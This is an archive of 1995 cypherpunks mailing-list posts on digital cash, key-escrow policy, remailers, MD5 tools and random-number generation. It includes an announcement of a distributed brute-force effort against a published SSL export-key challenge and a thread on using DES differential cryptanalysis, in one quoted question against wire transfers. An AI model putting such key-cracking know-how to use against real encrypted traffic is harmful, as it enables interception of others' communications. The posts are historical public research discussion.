Date: Tue, 22 Aug 95 21:39:35 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
In-Reply-To: <9508211648.AA17528@toad.com>
Message-ID: <Pine.SUN.3.91.950823143446.647P-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 1995, Peter Trei wrote:

> First world: Western (and Westernized) nations
> Second world: Communist bloc
> Third world: The rest, mostly poor nations. 

That's pretty much how I learned it in school, back in the 60s.  Mind
you, "third world" wasn't an insult then.

I also heard another version: 1st world was Europe/Asia (cuz they were
there first), 2nd world was America (they got discovered later), and 3rd
was everybody else.

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2DAA.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | D8 15 71 F9 26 C8 63 40  5E 63 5C 65 FC A0 22 99





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 23 Aug 95 11:55:33 PDT
To: cypherpunks@toad.com
Subject: Digital cash project? Re: The End of the Ecash Trial?
In-Reply-To: <199508231635.MAA07961@mummy.cis.ohio-state.edu>
Message-ID: <9508231854.AA22322@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>The only way to preserve the market would appear to be providing an
>ecash-for-ecash exchange with a new bank, presumably a licensee of the
>Digicash software. Such a bank could, out of little more than good
>will and a desire to kick-start a new e-currency, offer to exchange c$
>for the new ecash. Or, perhaps we just shrug our shoulders, kiss our
>hardly-earned Cyberbuck goodbye, and mumble about how it was fun while
>it lasted.

Well I might be interested in setting up such a scheme, but I'm not sure
that the Chaumian Anonymity guarantees could be provided as is. This is 
because of Chaum's patent on blind signatures.

There are schemes which offer weaker anonymity and also schemes which provide 
for faster movement of currency.

The scheme I am currently looking at employs both symmetric and asymmetric 
keying to provide for fast transfers of cash after a connection is set up. The 
mode of payment is of the fraction of cents per page type so RSA is too 
expensive.

Who would be interested in such a trial? Who would be interested in writing 
code? There are complications if the Web consortium is involved since we are 
obliged to provide code to our members one month in advance of the official 
release. But that is for source I believe, I don't think that there would be a 
problem with trial users or with exchanging code with collaborators. After the 
one month period all consortium code becomes copyright but freely available for 
use for any purpose, it's the X consortium contract in fact.


Cyberbucks could be siphoned out of the Chaum system by simply agreeing to 
exchange e-cash for whatever the new currency is. It would also be possible to 
go in the other direction perhaps, "I promise to pay the bearer on demand the 
sum of one cyberbuck".

Since most cyberbuck users are looking to control access to a resource it's not 
clear that the cyberbuck model is what is needed. It might be possible to deploy 
a resource contention arbitration mechanism which was not convertible. This 
would also avoid many of the regulatory problems of e-cash.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 23 Aug 95 12:02:24 PDT
To: cypherpunks@toad.com
Subject: Re: SSL Challenge - problem with NT client?
Message-ID: <9508231902.AA26831@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


(I think we need a separate code cracking list)

I've got the NT client up and running. It can connect to the server, and
download the challenges and I can request and select  keyspace. 

But I can't seem to ungray the 'search' button, so I can't test it.

Any ideas?




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: denning (Dorothy Denning)
Date: Wed, 23 Aug 95 15:13:05 EDT
To: banisar@washofc.epic.org
Subject: Australia and Encryption Policy
Message-ID: <bacb2926ddb79fa0101a724d73d55268@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Ross Anderson posted a message on the net recently stating that
Australia was proposing an encryption policy that would force residents
to use weak cryptography while banks would get key escrow.  His source
was a talk by Steve Orlowski, who is Assistant Director, Security
Management, in the Australian Attorney-General's Department.

Attached is a copy of an open letter by Mr. Orlowski in response to
that post.  He is not proposing that individuals be forced to use weak
encryption.  Key escrow would be an option available to anyone wanting
a high level of encryption.  Organizations and individuals could escrow
their own keys if desired.

This message and his letter may be forwarded.

Dorothy Denning
---------------

Dear

Thank you for your comments on the subject of the use of encryption by
private individuals.

Firstly I would like to make the point that the debate has arisen from
one person's interpretation of a paper I gave at a conference on
"Cryptography Policies and Algorithms".  The full text of that paper is
now available on the net at

	http://commerce.anu.edu.au/comm/staff/RogerC/RogersHome.html

The paper carries a disclaimer at the top that the views are mine and
do not necessarily represent the views of the Australian Government.
The paper sets out the Government's policy on telecommunications
interception, which includes the issue of the use of cryptography as:
"As a result of the Report, Australia is, among other TI issues,
monitoring the impact of encryption in the telecommunications
interception area and will re-examine matters in 1997 following the
opening of the telecommunications area to full competition."
Telecommunications covers both voice and data communications.

The last paragraph of the paper says that there is a need to expand the
cryptography debate to cover the needs of individual users in the
context of the information superhighway rather than current Internet
users.  The paper also points out that issues such as cost, convenience
and public confidence in cryptography systems will be the main issues.
Public confidence is explained in terms that as long as it meets the
general requirement for privacy it will be acceptable.  I still
maintain that the general user of the superhighway in the next century
will be satisfied with a lower level of encryption which will meet that
and cost and user friendliness requirements.

On the specific point made in the Internet message, the paper does not
suggest, either directly or by implication, that individuals should be
banned from using encryption.

Regarding the use of higher level encryption, the paper supports the
concept of commercial key escrow where organisations hold their own
keys but may be required to provide them in response to a court order.
The same would apply to individuals who could either hold their own keys
or store them with a commercial body.  Access to those keys would be by
court order and in that respect is no different to existing procedures
for the interception or seizure of telephone conversations or paper
records.  There is no suggestion that these basic principles, and
protection of individual's rights in general, should be changed.

If individuals were to use lower level encryption there would be no
need for them to maintain copies of any keys for such systems.  To my
mind this is preferable to a requirement for keys to be maintained for
all encryption systems, which could be the result if universal key
escrow were introduced.

Finally on the question of interception, the general public expects a
reasonable level of law enforcement to ensure the protection of their
person and property.  Governments are required to find a balance
between this and the rights of individuals to privacy.  Part of this
balance is to ensure that law enforcement authorities convince a court
that there is a need to carry out an interception.  There is no
suggestion that this fundamental approach should be changed.  The paper
certainly does not suggest that the Attorney-General's Department should
become a centralised interception authority.  In fact such a role would
not be consistent with its role as a source of advice to Government.

I hope the above clarifies both the Government's policy and my personal
views on these matters.

I consider this to be an open letter and have no objection to it being
used as such.

Yours sincerely

Steve Orlowski



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 23 Aug 95 07:17:57 PDT
To: ecm@ai.mit.edu
Subject: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
Message-ID: <6253.9508231416@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[a copy of final announce, start time 18:00 GMT, tomorrow (Thu), as
posted to a list of USENET groups]

This is a request for idle compute time for the brute force of Hal's
second SSL challenge.

You will likely have read about the brute force crack of a netscape
SSL session by Damien Doligez <Damien.Doligez@inria.fr>, which was
widely covered in the media, and much discussed in this (and other)
newsgroups.

Damien has information on his breaking of the 1st challenge at:

	http://pauillac.inria.fr/~doligez/ssl/

Hal Finney <hfinney@shell.portal.com> has now issued a 2nd challenge,
the aim with this challenge is to demonstrate in how short a time an
export SSL key can be broken.  ie not how soon, but how *quickly* from
start to finish (note the distinction), so for this reason we are
constructing a virtual start line, and the virtual start gun will fire
at:

	Thu Aug 24 at 18:00 GMT

If you are interested to join in, please obtain the sources / binaries
for your system in preparation for the start.  (Even if you are after
the start, join in as it will take a while).

Piete Brooks <pb@cl.cam.ac.uk> wrote and is hosting the socket server,
and WWW pages, see this URL for the socket client and brute forcing
software, and WWW forms interface key doler:

	http://www.brute.cl.cam.ac.uk/brute/

ftp archive (software available by both WWW and ftp):

	ftp://ftp.brute.cl.cam.ac.uk/pub/brute/


Prize fund - donate c$ for the prize
======================================================================

I have set up a prize fund in c$ (digicash ecash) to add a bit of fun
to the proceedings, and stimulate interest in DigiCash (the best ecash
on the planet IMO).

The prize fund at time of writing is c$ 292.30, and the winner will be
the person who hits the key.  The person who gets the prize will be
encouraged to participate in the ecash market to cash the money in, to
increase cash flow (there is currently a shortage of c$ sellers), and
to avoid taking the cash out of circulation.

Give your c$ donations for the prize fund here:

	http://dcs.ex.ac.uk/~aba/sslprize.html

(or via email: shop-id: SSL-prize-fund, account-id: aba@dcs.ex.ac.uk)

The (unofficial) digicash exchange:

	http://www.c2.org/~mark/ecash/ecash.html

Sign up for the Digicash trial (get c$ 100 free on opening account):

	http://www.digicash.com/ecash/

A couple of things to note, the ecash exchange is not affiliated with
digicash, it is an experiment set up by digicash enthusiasts to allow
a floating exchange mechanism for buying and selling c$.  The other
thing to note is that exchange rate is currently (from the exchange
above) about 100 c$ = 5 US $.


Compiling for some platforms required
======================================================================

We are currently lacking a DOS only version of the BRUTESSL.EXE, this
is complicated by the fact that Andrew Roos <AndrewR@vironix.co.za>
has 32 bit 80x86 assembly speedups as well as a generic C version in
his brutessl application which makes it tricky to get a 32 bit
application.  (Oh for standard flat 32 bit UNIX).  Apparently it is
possible using the Pharlap DOS extender software, so if anyone is able
to help with this, please contact Piete or myself (Adam).

Also (an easier task!) could someone compile a 16 bit one, which we
can use to fall back on if the above doesn't work.  I did this myself,
but my PC HD has probs of its own at the moment, all you have to do
is edit search.c brutessl.h brutessl.c lightly to fix up the macro for
rotate left (makes a difference if your compiler supports it), and to
make sure that the typedef (I think in brutessl.h) is set up so that
word = a long.  Don't use the assembly.c but rather the generic C
version search.c, that'll make things easier.

Any platforms you would like to see pre-compiled binaries for, send
them along, the source code is available from the ftp, and http
addresses above.  A MAC binary would be nice also.


More technical things... skip unless you're interested
======================================================================

The socket server which will be doling out the keys is running on:

	sksp.brute.cl.cam.ac.uk:19957

but you shouldn't need to know that unless you like to know what's
going on; the client software is wired to use this by default.

There is a draft RFC-like specification for the SMTP-like protocol
which the client and server use to talk to each other (SKSP = Simple
Key Searching Protocol):

	http://www.brute.cl.cam.ac.uk/ftp/pub/brute/protocol.txt


Who's doing what (who to complain to about things not working :-)
======================================================================

Hal Finney	Issued challenge 1 and 2
Piete Brooks	hosting www, and socket server, author of unix socket code
Andrew Roos	wrote brutessl app
Andy Brown	wrote windows NT client & protocol spec with Piete
Adam Back	general software questions, prize fund ecash shop

Damien Doligez	Broke 1st challenge
Eric Young	\ independently broke 1st challenge also
David Byers	/

Mark Grant	WWW Ecash exchange

email / www for those people:

Hal Finney <hfinney@shell.portal.com> 	  http://www.portal.com/~hfinney/
Andy Brown <a.brown@nexor.co.uk>
Piete Brooks <pb@cl.cam.ac.uk> 		  http://www.cl.cam.ac.uk/users/pb/
Adam Back <aba@dcs.ex.ac.uk> 		  http://dcs.ex.ac.uk/~aba/
Andrew Roos <AndrewR@vironix.co.za>
Damien Doligez <Damien.Doligez@inria.fr>  http://pauillac.inria.fr/~doligez/
Eric Young <eay@mincom.oz.au>
David Byers <davby@ida.liu.se>
Mark Grant <Mark.Grant@insignia.co.uk>	  http://www.c2.org/~mark/

(also lots of other people have offered compute time, and / or
contributed technical advice / bug reports etc)


Adam Back <aba@dcs.ex.ac.uk>
Piete Brooks <pb@cl.cam.ac.uk>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMDs4MCnIuJ1VakpnAQEG7gQAhQck5IoTQ9/jLcsD903u7yTRKssLJqxx
Fxk2MpEWkPfIchD7cD7F4ZgO1gs+q6/rMxzEfS5YUZAb9Z4nCF1EUr2Qf2O5sIWV
fFNjVJMCt4clGOQoG1KdJ9Om93JxIGQl2ep7OLc0RdCUFd8wRWC3yPC+2Tl8069m
gHRtAJ0My3U=
=LWFM
-----END PGP SIGNATURE-----
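
Added example (not part of Adam Back's post and not brutessl's code): the 16-bit porting note above asks for a typedef that makes word a long and for a working rotate-left macro. One portable way to write both, with a self-test to run before searching any keyspace, is sketched below; the names word, ROTL32 and rotate_selftest are assumptions made for this example.

```c
#include <limits.h>
#include <stdio.h>

/* On a 16-bit DOS compiler int is only 16 bits wide, so the 32-bit
   quantities must live in unsigned long, the one standard type that is
   guaranteed to be at least 32 bits everywhere. */
typedef unsigned long word;

/* unsigned long may be wider than 32 bits (64 on most modern Unix
   systems), so every result is masked back down to 32 bits. */
#define WORD_MASK 0xFFFFFFFFUL

/* Rotate the low 32 bits of x left by n, with n taken modulo 32.
   Masking both shift counts with 31 keeps n == 0 and n == 32 away from
   an undefined shift by the full width on a 32-bit long.
   Note: x is evaluated twice, so do not pass expressions with side
   effects. */
#define ROTL32(x, n) \
    ((((word)(x) & WORD_MASK) << ((n) & 31) | \
      ((word)(x) & WORD_MASK) >> ((32 - ((n) & 31)) & 31)) & WORD_MASK)

/* Known-answer self-test.  Returns 0 when the build is sane, otherwise a
   small code naming the first check that failed. */
int rotate_selftest(void)
{
    /* 1: word is too narrow to hold 32 bits */
    if (sizeof(word) * CHAR_BIT < 32)
        return 1;
    /* 2: top bit must wrap around to bit 0 */
    if (ROTL32(0x80000001UL, 1) != 0x00000003UL)
        return 2;
    /* 3: byte-sized rotate */
    if (ROTL32(0x12345678UL, 8) != 0x34567812UL)
        return 3;
    /* 4: rotate by zero must be the identity */
    if (ROTL32(0x12345678UL, 0) != 0x12345678UL)
        return 4;
    /* 5: rotate by 32 is also the identity (count is mod 32) */
    if (ROTL32(0x12345678UL, 32) != 0x12345678UL)
        return 5;
    /* 6: rotate left by 31 equals rotate right by 1 */
    if (ROTL32(0xDEADBEEFUL, 31) != 0xEF56DF77UL)
        return 6;
    return 0;
}

int main(void)
{
    int rc = rotate_selftest();

    if (rc != 0) {
        printf("rotate self-test FAILED at check %d\n", rc);
        return 1;
    }
    printf("rotate self-test passed\n");
    return 0;
}
```

A client built with a wrong word width or a broken rotate would sweep its keyspace segment and report it empty, so a nonzero self-test result should keep that build out of the search.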





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 23 Aug 95 00:23:41 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: The sorry state of non-US crypto
In-Reply-To: <199508230536.BAA02012@bb.hks.net>
Message-ID: <Pine.LNX.3.91.950823151630.14787E-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 1995, Lucky Green wrote:

> I just spent an hour surfing the various crypto/cypherpunks web sites. In
> this hour I did not come across a single non-US site that carried anything
> else but PGP. Most non-US sites just carry rants about the evil ITAR, and
> a few carry the various international versions of PGP. That's it. I know
> that there are several European ftp sites that have other cryptographic
> software as well, but I sure as hell can't find them by browsing the web.

Try these URL's:

Italy:   ftp://ftp.dsi.unimi.it/pub/security/crypt/
UK:      ftp://ftp.ox.ac.uk/pub/crypto/
Croatia: http://pgp.rasip.fer.hr/
Germany: ftp://ftp.darmstadt.gmd.de/pub/crypto/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 23 Aug 95 13:53:04 PDT
To: nobody@flame.alias.net (Anonymous)
Subject: Re: Out of state gambling
In-Reply-To: <199508171002.MAA01952@utopia.hacktic.nl>
Message-ID: <9508232052.AA14383@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes
>Could someone, perhaps a furriner, perhaps talk to the folks
>at casino.org and see if they would be willing to open a book on
>presidential election outcomes.  Or perhaps organize something with
>an enterprising London/Moscow gambling house, preferably with fast
>IP feed, and constantly updated odds on the web.

None of this is necessary.  The University of Iowa's Business School
already has this sort of thing.  They run a real-money futures market
which currently has the following three markets:

1996 Presidential Election
1996 Republican Convention Nomination
1996 Colin Powell Nomination

The URL is <URL:http://www.biz.uiowa.edu/iem/index.html>

Just as an aside, the Republicans have been steadily losing ground
over the last three months.  The difference between the Republican
coupon and the Clinton reelection coupon is about 1/2 cent, down
from 10 cents or so a few months ago.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Wed, 23 Aug 95 12:52:45 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Australia and Encryption Policy (fwd)
Message-ID: <Pine.PMDF.3.91.950823155055.623131195H-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Don't know quite how I became a Denning <--> cypherpunks conduit, but 
there you are; anyway this time she is passing on Orlowski's response to 
Ross Anderson.  I have no part in this debate, honest.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki

---------- Forwarded message ----------
Date: Wed, 23 Aug 1995 15:29:17 -0400 (EDT) 
From: Dorothy Denning <denning@cs.cosc.georgetown.edu>
To: MFROOMKI@umiami.ir.miami.edu
Cc: denning@cs.cosc.georgetown.edu
Subject: Australia and Encryption Policy 


----- Begin Included Message -----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 23 Aug 95 12:57:14 PDT
To: cypherpunks@toad.com
Subject: is there...
Message-ID: <199508231956.PAA10953@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Is there an online version of Raph's anonymous remailer list for FTP
or on the web? I suddenly need to give it to someone.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Wed, 23 Aug 95 13:12:06 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Remailer list pinging by e-mail
In-Reply-To: <199508231956.PAA10953@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950823160647.29928B-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 1995, Perry E. Metzger wrote:

> 
> Is there an online version of Raph's anonymous remailer list for FTP
> or on the web? I suddenly need to give it to someone.
> 
> .pm
> 


Try sending a message to 

mg5n+remailers@andrew.cmu.edu 

the automagical reply should be the most current listing of Raph's list.



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 23 Aug 95 13:14:45 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: FBI Files on Clipper Release
In-Reply-To: <Pine.D-G.3.91.950817035141.3096A-100000@dg.thepoint.net>
Message-ID: <9508232014.AA18754@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


An FBI document reads:
# To ensure that this occurs, legislation mandating the 
# use of Government-approved encryption products or 
# adherence to Government encryption criteria is required.

Ex-AAG Jo Ann Harris told a Senate Judiciary Subcommittee in 1994:
$ we have absolutely no intention of mandating private use of a particular
$ kind of cryptography, 

I ranted:
% Just what real legal recourse do we have against lying scum in the
% bureaucracy ?  

Brian Davis writes:
> You sure are anxious to prosecute government officials.  

You're damn right I'm anxious to prosecute government officials who appear
to have willfully lied about public policy in testimony before Congress !

Look, plenty of people here are honest-to-[insert your higher power of
choice here] anarchists. I happen to be at most an anarchogroupie ;) and
I'm reasonably comfortable with the U.S. version of representative democracy.

[Note to the list: I'm not looking to spark any sort of debate about political
philosophy, on or off the list. I'm not interested in arguing semantics, so 
don't bother trying.]

For representative democracy to be even vaguely democratic at all, the
representatives need to level with their constituents as much as possible.
I certainly intend to hold public officials speaking in an official
capacity about official business to a high standard of conduct. 

> What is untrue about her statement.  Maybe she meant it's OK to use
> ROT-13 but nothing else ...

How could that be compatible with "no intention of mandating...a particular
kind of cryptography" ?

> And you guys complained about the Jake Baker prosecution!

Non-sequitur. How is the Baker case relevant to this ?

-Futplex <futplex@pseudonym.com>
"Say goodbye to the clowns in Congress" -Elton John/Bernie Taupin



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 23 Aug 95 07:46:57 PDT
To: cypherpunks@toad.com
Subject: Upcoming Key Escrow Meetings
Message-ID: <199508231446.QAA03234@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



August 22, 1995

MEMORANDUM

From:  Ed Roback, NIST

Subject:  Upcoming Key Escrow Meetings

Attached for your information are notices of two upcoming
key escrow-related meetings.  The first, to be held on
September 6-7 at NIST will focus on two principal topics: 
1) discussion of finalizing the criteria for the
exportability of software key escrow encryption with
64-bit key space; and 2) the desirable characteristics
for key escrow agents.  The second will be held on
September 15 at the Gaithersburg Hilton and will focus on
the development of Federal Information Processing
Standards for key escrow encryption, specifically to
include software implementations.

You are invited to attend one or both meetings and, if
you so choose, to speak at these meetings.  I hope to
have sufficient time for discussion, and therefore
encourage presentations to be clearly focused on the
topic at hand.

If you wish to attend, please notify me [sic] secretary, Arlene
Carlton on 301/975-3240, fax: 301/948-1784 or e-mail:
carlton@micf.nist.gov.  Also, please let her know if you
would like to make a presentation with your
recommendations on either topic, or propose an additional
topic.  If you have any additional questions or
suggestions, please feel free to contact me on
301-975-3696.

Attachments (2)

             ----------------------------

                 Meeting Announcement:
                   Key Escrow Issues

The Commerce Department's National Institute of Standards
and Technology invites industry representatives and other
interested parties to a meeting on September 6 and 7, to
discuss issues related to key escrow encryption.  While
not limited, two principal agenda items for discussion
will be: 1) developing the criteria for software key
escrow encryption exportability and 2) the desirable
characteristics for U.S. key escrow agents.

Industry has asked the government for criteria for the
export of software key escrow encryption.  Rather than
simply publishing criteria, however, the Administration
desires consultations with industry in preparing final
criteria for publication.   This session of the meeting
will begin with a presentation of the government's
perspective of the desirable criteria, followed by a
chance for other participants to offer their thoughts on
this issue as well as reaction to the federal
perspective.  Under acceptable criteria, the government
is willing to allow for the export of strong cryptography
(e.g., DES) when coupled with a key escrow mechanism.  It
is anticipated that this would be coupled with a one-time
product review (e.g., as is the case for RC2/RC4
products) by the Department of State.  Following such
approval, the Department of Commerce would administer
export regulations.

The second session of the meeting will address the
desirable characteristics of acceptable U.S. escrow
agents.  Clearly, if export of key escrow encryption
products will be allowed, the cryptographic keys must be
stored with some entity.  This session will address the
criteria for the approval of such organizations.

It may also discuss what sort of legal protections, if
any, may be necessary to provide, for example, against
unauthorized release of encryption keys.  Follow-up
meetings to both issues may be necessary.

Other related topics may be included, time permitting. 
Note that a separate meeting has been scheduled for
9/15/95 to discuss the development of federal standards
for key escrow encryption.

Government representatives will attend from the Office of
Science and Technology Policy, the Department of State,
the Department of Justice, the Department of Commerce,
the National Security Agency, and the Federal Bureau of
Investigation.

If you would like to make a presentation with your
recommendations on either topic, or propose an additional
topic, please contact Ed Roback at NIST on 301-975-3696. 
Presentations may be limited in length to accommodate all
speakers.  The meeting will be open to the public,
although seating is limited. Advance registration is
requested, please contact Arlene Carlton on 301/975-3240,
fax: 301/948-1784 or e-mail: carlton@micf.nist.gov.  The
meeting will be held at the NIST in Gaithersburg,
Maryland.

8/17/95

              ---------------------------

                Workshop Announcement:
        Developing Federal Key Escrow Standards

On September 15, 1995, the Commerce Department's National
Institute of Standards and Technology will hold an
exploratory workshop on developing Federal Information
Processing Standards (FIPS) for key escrow encryption,
specifically to include software implementations.  This
effort is being initiated to further the Administration's
commitment to federal use of key escrow encryption.

Industry representatives and other interested parties are
invited to the workshop to provide their perspectives on
the desirable characteristics of key escrow encryption
standards to NIST and other federal officials. 
Government representatives also will present their
objectives and preliminary approach to this standards
development process.  Discussion will also include
proposals for follow-on activities.

For discussion purposes, one initial option for this
standards activity may be to create a generic key escrow
encryption standard containing criteria for federal use
of key escrow techniques implemented in either software
or hardware.  This high-level standard could then be
supplemented with lists of validated key escrow
techniques.  (Currently FIPS 185, "Escrowed Encryption
Standard," a hardware-based standard, is the only
FIPS-approved key escrow technique.)  Guidance would also
be needed to guide selection of appropriate key escrow
techniques for particular applications.  Key escrowing
will be used by federal agencies (and others, if they so
choose) in conjunction with FIPS-approved encryption
techniques.  Development and implementation of such
standards are necessary to guide federal agencies in
effectively and securely implementing key escrow
encryption.

If you would like to make a presentation with your
recommendations for the development of federal key escrow
standards, please contact Ed Roback at NIST on
301-975-3696. Presentations may be limited in length to
accommodate all speakers.

The meeting is open to the public, although seating is
limited to approximately 100 individuals.  Advance
registration is requested; please call Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail:
carlton@micf.nist.gov to register.  The meeting will be
held at Gaithersburg Hilton Hotel, 620 Perry Parkway,
Gaithersburg, Maryland.

8/17/95 

--

From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Wed, 23 Aug 95 12:50:05 PDT
To: andrew_loewenstern@il.us.swissbank.com
Subject: Re: DES & RC4-48 Challenges
Message-ID: <199508231949.AA25702@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 95 11:53:22 -0500 you wrote:

>Dan Bailey writes:
>>  According to Biham and Shamir's Differential Cryptanalysis of DES,
>>  "An interesting feature of the new attack is that it can be applied
>
>If I read this correctly, then the keys used for generation of the chosen  
>plaintext-cyphertext pairs is irrelevant and once the required computation is  
>done, one can crack any '...one of the keys can be computed in real time while  
>it is still valid.'..
>
I haven't read this entire book, mainly because a lot of it is over my
head with some pretty esoteric proofs.  The impression I got was that
if the cryptanalyst is steadily keeping up with the key changes until
he collects the required 2^36 from a pool of 2^47 valid
plaintext/cyphertext pairs, he then can recover the last key used.  I
don't understand what constitutes a "valid" pair in this context. 
Also, I'm not sure if all the computation he's done to get to that
point is applicable in his attack on the next key.  It appears not. 
If all of his precomputation was somehow salvageable, I think we'd
already have heard about someone actually doing it.
	But then again, I don't understand how his precomputation could *not*
be applicable. He'd just have to drop off the computations done for
the first key.  Perhaps the difficulty in this problem comes from not
knowing when the source is changing keys.
	According to Schneier, "To get the requisite data for this attack,
you have to encrypt a 1.5Mbits/second data stream of chosen plaintext
for almost three years." (240)  With the massively-parallel nature of
Cypherpunks, this is probably feasible, assuming we could figure out
what needed to be done.
	Another angle is cracking a reduced-round version of DES.  8-round
DES can be analyzed in 2^9 using differential cryptanalysis.  Since
I'm sure the press doesn't really understand using multiple rounds in
iterated cryptosystems, maybe that little detail would slip by.  2^9
could easily be handled by an Alpha in the evening.
						Dan

>So what, exactly does this mean?  Can I do most, if not all of the feeding of  
>chosen plaintext into my personal DES box in my basement, do the required  
>computation (admittedly there is a lot of work to do here), then go out and  
>start breaking wire-transfers with a minimal of chosen plaintext?  That is  
>what the above quotation would seem to imply.
>
>Seems incredible...  I surely must be reading much more into the passage than  
>is really there...
>
>andrew
>
>
>
******************************************************************************
"I think, therefore I am" - Descartes                            Dan Bailey
"I don't think, therefore I'm a moustache." - Sartre		    dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 23 Aug 95 14:57:33 PDT
To: John Young <jya@pipeline.com>
Subject: Re: RUB_han
In-Reply-To: <199508171545.LAA10941@pipe1.nyc.pipeline.com>
Message-ID: <9508232157.AA18612@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


How does one go about retrieving the text of these articles?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 23 Aug 95 15:00:49 PDT
To: cypherpunks@toad.com
Subject: Re: MD5 in DOS
Message-ID: <199508232159.RAA28864@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




nobody wrote:
>im looking for a md5 binary that will run on dos.
>can anyone give me a pointer?

There is a program for DOS called MDx which does both MD4 and MD5, and is
pretty fast, too.  It can be found at:

ftp://oak.oakland.edu/SimTel/msdos/fileutil/xsum11.zip

or

ftp://garbo.uwasa.fi/pc/fileutil/xsum11.zip

Or at mirrors of the SimTel or Garbo archives.  I cannot claim to be
unbiased, though -- I wrote it (with a little help from Phil Karn's
fast assembly MD5 translate function!)  xsum 1.1 is freeware.

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 23 Aug 95 15:31:19 PDT
To: Andrew.Spring@ping.be
Subject: Re: Random Hiss from Mac mike
In-Reply-To: <199508232105.OAA27566@comsec.com>
Message-ID: <9508232228.AA17098@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 23 Aug 1995 19:09:35 +0100
>From: Andrew.Spring@ping.be (Andrew Spring)



>I've been looking at using the Mac's Sound Input Manager for hardware RNG.

[...]

>I suspect there's much less entropy in that signal than even this estimate,

[...]

>Does anybody have any experience/advice in this area?

I would try injecting noise and seeing how well you can control the output
signal.  I would also do a Fourier transform of the output and look for
cyclic behavior -- then see how the frequency spectrum can be modified by
turning machinery on and off, turning radios on and off, ....

You can also try various compression algorithms to see how much entropy
they claim to see.

When that's done, you can then use some of my ranno conditioning code,
free on the net (although written for UNIX, for now):

	http://www.clark.net/pub/cme/html/ranno.html

I especially like running a pseudo-random stream through ranM and then a
hash, to obliterate any patterns which might sneak past your analysis.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
